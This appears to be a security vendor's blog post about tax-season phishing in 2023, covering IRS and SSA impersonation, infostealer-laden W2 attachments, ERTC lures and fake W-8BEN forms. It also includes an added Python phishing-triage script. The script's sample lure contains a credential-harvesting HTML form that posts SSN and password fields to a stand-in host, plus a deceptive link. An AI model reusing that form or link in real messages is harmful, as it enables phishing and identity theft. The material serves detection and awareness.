SpiderLabs Blog

2023 Tax Scam Emails Exposed: Unmasking Deceptive Trends

Tax season is a busy time of year for taxpayers and threat actors. Consumers and businesses focus on filing their taxes and getting excited over possible refunds, while cybercriminals roll out both their tried-and-true tax scams along with implementing new efforts. However, tax time can also be quite stressful with consumers and those charged with handling an organization’s tax filings hyper aware of any notifications from the government that might impact their filing or refund.

Threat actors know and utilize this fear, so to help prepare everyone, Trustwave SpiderLabs will break down some of the most common tax season trends and scams the team has observed during the first quarter of 2023 and provide tips on how to stay safe during this time of year.

HTML Extensions Dominate Tax Season Email Scams

According to our data, since the start of this year the top two file extensions used in tax season email scams are .htm and .html, accounting for 62% of all attachments. HTML is a popular choice in scam emails because it lets cybercriminals build realistic-looking web pages with diverse content, which makes it easier to lure people into opening malicious emails. Caution is warranted: an HTML attachment can deliver harmful software or send users to fake websites where they may be asked to share sensitive information.

Figure 1. Pie chart of attachment extensions used in tax-themed scams since Jan 01, 2023.

Navigating Tax Season Safely: 5 Common Scams to Watch Out For

With tax season in full swing, stay cautious and alert to the phishing attempts and scams arriving in your inbox. To assist with this, Trustwave SpiderLabs has compiled a list of the most prevalent tax scams this season, based on data collected through Trustwave's spam traps and other monitoring systems.

1. IRS Impersonation Scams

U.S. IRS impersonation scams see fraudsters pose as the tax agency to manipulate victims into divulging sensitive personal and financial information. Fraudsters often use fear of prosecution for breaking the law or the promise of monetary gain to deceive unsuspecting taxpayers.

SpiderLabs recently spotted a phishing email, shown below, impersonating the Internal Revenue Service (IRS) and offering the stunning amount of $16.5 million in approved funds if the target provides the requested information. The email asks for personal details such as name, address, phone number, occupation, and ID card to be sent back over email. The message preys on the recipient's desire for financial gain, hoping they will ignore the warning signs, including the very poor wording of the email, and give away their sensitive data.

Figure 2. Screenshot of the email impersonating the IRS with subject line reading ‘Internal Revenue Service.’

In the example below, we present another instance of a phishing attempt that falsely claims to be from ‘ShareFile’ on behalf of the IRS. The email requests the user to review the attached HTML document.

Figure 3. Email with subject line ‘Internal Revenue: Review Document (redacted@redacted.com)’ impersonates the IRS.

The attachment directs users to a counterfeit ‘ShareFile’ login page, where victims input email credentials and additional sensitive data like mother's maiden name, social security number, and date of birth. This information can be exploited for identity theft, financial fraud, and unauthorized account access, or sold to cybercriminals on the dark web.

Figure 4. Screenshot of the HTML file named ‘TaxProfile(IRS).html’ asking for sensitive information.

Another method is for scammers to impersonate IRS officials.

Important IRS Reminder:

Remember, the IRS does not use email, phone calls, or text messages to request personal or financial information from taxpayers. Instead, it primarily communicates through regular mail delivered by the United States Postal Service.

Being aware of this can help you avoid falling for scams that impersonate the IRS.

2. Malware Delivered Through Tax Documents

A recent tax-related email campaign SpiderLabs observed involved an attacker sending an email with a .docx file named ‘W2-2022.docx,’ claiming it contained important tax details for the recipient to review. In fact, opening the file connects the user to a harmful website that leads to the installation of infostealer malware.

Infostealer malware is used by cybercriminals to snatch sensitive data like usernames, passwords, and financial information. It operates by logging keystrokes, capturing screenshots, and tracking a user’s Internet activities, as well as gathering data from email accounts, web browsers, and other applications.

Figure 5. ‘W2-2022’ email subject with ‘W2-2022.docx’ attachment delivers info-stealing malware.

3. Tax Refund Scams

Tax refund scams are successful because many individuals anticipate refunds from the IRS.

A recent Facebook-themed phishing scam alleges that the recipient is under investigation for tax evasion and requests account verification so that a tax refund can be processed. Users are prompted to click an email URL on the ‘m.me’ domain, which is owned by Meta (formerly Facebook Inc.) and normally directs users to Messenger pages or conversations. In reality, the link leads the user into a trap where they are asked to provide personal information, login credentials, or even financial details.

Figure 6. ‘Message from Facebook’ email uses Tax Refund and Tax Evasion as themes.

Another common tax refund-themed scam involves the Employee Retention Tax Credit (ERTC), a legitimate government tax credit designed to help businesses cover payroll costs and retain employees.

Scammers send spam emails promising businesses up to $26,000 per employee through the ERTC program. The emails ask owners to fill out a form on a suspicious website or call a phone number. Here's an example of such a scam message.

Figure 7. ERTC scam with subject line of ‘Small Business owners are owed $ 26,000 Per Employee.’

When the user clicks the email link, they are taken to the website shown below and prompted to supply financial information, which the scammers can then use to steal further sensitive data.

Figure 8. Screenshot of the ertcmoneyforyou[.]com webpage.

4. Phishing via Fake Tax Forms

Scammers are known to stick with a method that still works, so many scams still use fake tax forms to trick people. Form W-8BEN, which is typically used to establish foreign status for tax purposes, is one of the most common forms attackers use.

Threat actors running this scam take the old-school approach of sending the victim a letter by mail or fax. As shown in the example below, the notification claims the victim is exempt from paying taxes but must still authenticate their information by filling out the fake W-8BEN form. The victim is urged to fax the completed form back to a fake IRS number that is controlled by the scammer.

Figure 9. Phishing email using a fake tax form with subject line ‘MID YEAR-NON-RESIDENT ALIEN TAX EXEMPTION UPDATE.’

Figure 10. The fake W-8BEN tax form, which includes a fake IRS fax number.

5. Social Security Number Scams

This type of scam, where fraudsters impersonate the Social Security Administration (SSA) and claim that the recipient's Social Security Number (SSN) has been terminated due to illegal activity, is designed to exploit fear and confusion. The goal of the scammers is to obtain personal information, such as SSNs, bank account details, or other sensitive data, which can then be used for identity theft or financial fraud.

Commonly, as can be seen in the email below, scammers send a document with a message that urges the victim to call a fake customer support line to resolve the issue. If the victim calls, they may be asked to provide personal information that can be used for identity theft or financial fraud.

Figure 11. Email screenshot with subject line of ‘SSN terminated due to suspicious activity.’

Figure 12. The attached PDF document claims the recipient's SSN account is terminated and directs them to call a fake support number for assistance.

How to Protect Against Tax Season Scams:

  • Be cautious and verify: Avoid opening unsolicited emails and then double-check the sender's address. Confirm information through official channels like organization websites or direct calls. For instance, if you receive a suspicious email that appears to be from the IRS, visit the official IRS website or call their helpline to verify its legitimacy.
  • Practice safe clicking: Refrain from clicking links or downloading attachments in suspicious emails to prevent exposure to malware or viruses. Before clicking a link, hover your cursor over it to reveal the actual URL. This can help you identify if the link leads to a suspicious or unrelated website, which may be an indicator of a phishing attempt.
  • Recognize and resist urgency: Exercise caution when receiving urgent requests, as scammers often use them to pressure victims into taking impulsive actions without proper consideration. Be skeptical of emails demanding immediate action or threatening consequences.
  • Safeguard personal information: Avoid sharing personal data, such as bank details or Social Security numbers, via email, phone, or other channels unless you're sure the communication is legitimate. Verify the requester's identity before providing information. Regularly monitor credit reports and financial statements for signs of fraud.
  • Use secure tax filing methods: When e-filing taxes, pick a reliable tax preparation service. Check their reputation, read reviews, and ensure they have a history of safeguarding client data. Established services generally have strong security measures to protect sensitive information.
  • Stay educated and updated: Stay informed about the latest phishing and social engineering techniques. Keep your operating system, antivirus, anti-malware and other application software up to date to ensure that your system is protected against the latest threats.
  • Report suspected scams: If you encounter a tax season scam or believe you have been victimized by one, report the incident to appropriate authorities to help prevent others from falling prey to similar schemes.
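The checks above, together with the HTML-attachment credential-harvest pattern described for the ‘ShareFile’ lure, can be turned into a triage script. The following Python is an added example written for this page; it is not Trustwave's code and not a tool from the post. It uses only the standard library to parse a raw email and report the indicators discussed: an agency display name on a non-agency sender domain, tax-themed and urgency wording, .htm/.html attachments whose forms ask for credentials or identity data, and links whose visible text shows a different domain than the real href (what hovering over a link reveals). OFFICIAL_DOMAINS, the keyword lists, and the sample message are assumptions constructed for illustration, not a vetted ruleset or a real capture.

```python
"""Tax-season phishing triage (added example, not Trustwave's code)."""
import re
from email import message_from_string, policy
from email.message import EmailMessage
from email.utils import parseaddr
from html.parser import HTMLParser

# Assumed agency domains; per the post, the IRS does not request data by email at all.
OFFICIAL_DOMAINS = {"irs.gov", "ssa.gov"}
IMPERSONATION_RE = re.compile(r"\b(irs|internal revenue|social security|ssa)\b", re.I)
TAX_LURES = ("tax", "refund", "w-2", "w2-", "w-8ben", "ertc", "ssn")          # constructed list
URGENCY = ("immediately", "terminated", "suspended", "within 24 hours", "investigation", "evasion")
SENSITIVE_FIELDS = ("password", "passwd", "ssn", "social", "maiden", "dob", "birth", "routing", "card")


class FormFieldScanner(HTMLParser):
    """Collects the names of user-fillable <input> elements in an HTML document."""

    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "text").lower() not in ("submit", "hidden", "button"):
            self.fields.append((a.get("name") or a.get("id") or a.get("placeholder") or "").lower())


def sensitive_form_fields(html_text):
    """Input names that ask for credentials or identity data (credential-harvest indicator)."""
    scanner = FormFieldScanner()
    scanner.feed(html_text)
    return [f for f in scanner.fields if any(k in f for k in SENSITIVE_FIELDS)]


def mismatched_links(html_text):
    """(visible text, href) pairs where the text shows a domain other than the href's host."""
    found = []
    for href, inner in re.findall(r'<a[^>]+href="([^"]+)"[^>]*>(.*?)</a>', html_text, re.I | re.S):
        shown = re.sub(r"<[^>]+>", "", inner).strip()
        shown_host = re.search(r"(?:https?://)?([\w-]+(?:\.[\w-]+)+)", shown, re.I)
        href_host = re.sub(r"^https?://", "", href, flags=re.I).split("/")[0].lower()
        if shown_host and shown_host.group(1).lower() != href_host:
            found.append((shown, href))
    return found


def sender_impersonation(msg):
    """True when the display name claims a tax or benefits agency but the address does not."""
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    return bool(IMPERSONATION_RE.search(name)) and domain not in OFFICIAL_DOMAINS


def triage(raw):
    """Return the indicators found in a raw RFC 822 message string, plus a score."""
    msg = message_from_string(raw, policy=policy.default)
    text = (msg.get("Subject") or "") + " "
    findings = {"impersonation": sender_impersonation(msg), "attachments": [],
                "html_attachment_fields": [], "mismatched_links": []}
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        fname, ctype = part.get_filename(), part.get_content_type()
        if fname:
            findings["attachments"].append(fname)
        if ctype == "text/html":
            body = part.get_content()
            if fname:   # HTML attachment: the page the recipient would open locally
                findings["html_attachment_fields"] += sensitive_form_fields(body)
            else:       # rendered HTML body: the links the recipient would click
                findings["mismatched_links"] += mismatched_links(body)
            text += re.sub(r"<[^>]+>", " ", body) + " "
        elif ctype == "text/plain":
            text += part.get_content() + " "
    low = text.lower()
    findings["tax_lure"] = any(k in low for k in TAX_LURES)
    findings["urgency"] = any(k in low for k in URGENCY)
    findings["html_attachments"] = [f for f in findings["attachments"] if f.lower().endswith((".htm", ".html"))]
    findings["score"] = sum(bool(findings[k]) for k in
                            ("impersonation", "tax_lure", "urgency", "html_attachment_fields", "mismatched_links"))
    findings["verdict"] = "suspicious" if findings["score"] >= 3 else "review"
    return findings


def build_sample():
    """Constructed message modelled on the ‘ShareFile on behalf of the IRS’ lure (not a real capture)."""
    m = EmailMessage()
    m["From"] = "Internal Revenue Service <notice@sharefile-notice.invalid>"   # assumed sender
    m["To"] = "taxpayer@example.com"
    m["Subject"] = "Internal Revenue: Review Document"
    m.set_content("Your tax profile must be verified immediately. Open the attached document.")
    m.add_alternative('<p>Or verify online: <a href="http://login.harvest-site.invalid/x">'
                      'https://www.irs.gov/verify</a></p>', subtype="html")
    attachment = ('<html><body><form action="http://collect.harvest-site.invalid/post" method="post">\n'
                  '<input name="email"><input type="password" name="password">\n'
                  '<input name="ssn" placeholder="Social Security Number"><input name="mother_maiden">\n'
                  '<input type="submit" value="Review"></form></body></html>\n')
    m.add_attachment(attachment, subtype="html", filename="TaxProfile(IRS).html")
    return m.as_string()


if __name__ == "__main__":
    for key, value in triage(build_sample()).items():
        print(f"{key}: {value}")
```

Run against a saved .eml file by passing its contents to triage(). The HTML attachment is only parsed, never rendered, so the form and its action URL are inspected without any request being made; mismatched_links is a text-level version of the “hover to reveal the actual URL” advice and will also flag legitimate tracking redirects, which is why the output is a score for an analyst rather than a block decision.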

Don't let tax season cyber threats catch you off guard. Tax-related scams and cyberattacks are a constant danger, with cybercriminals adapting their tactics to target individuals and businesses alike. By staying informed, being cautious, and following online security best practices, you can minimize the risk of falling victim to these scams.

Stay aware and stay safe during tax season!
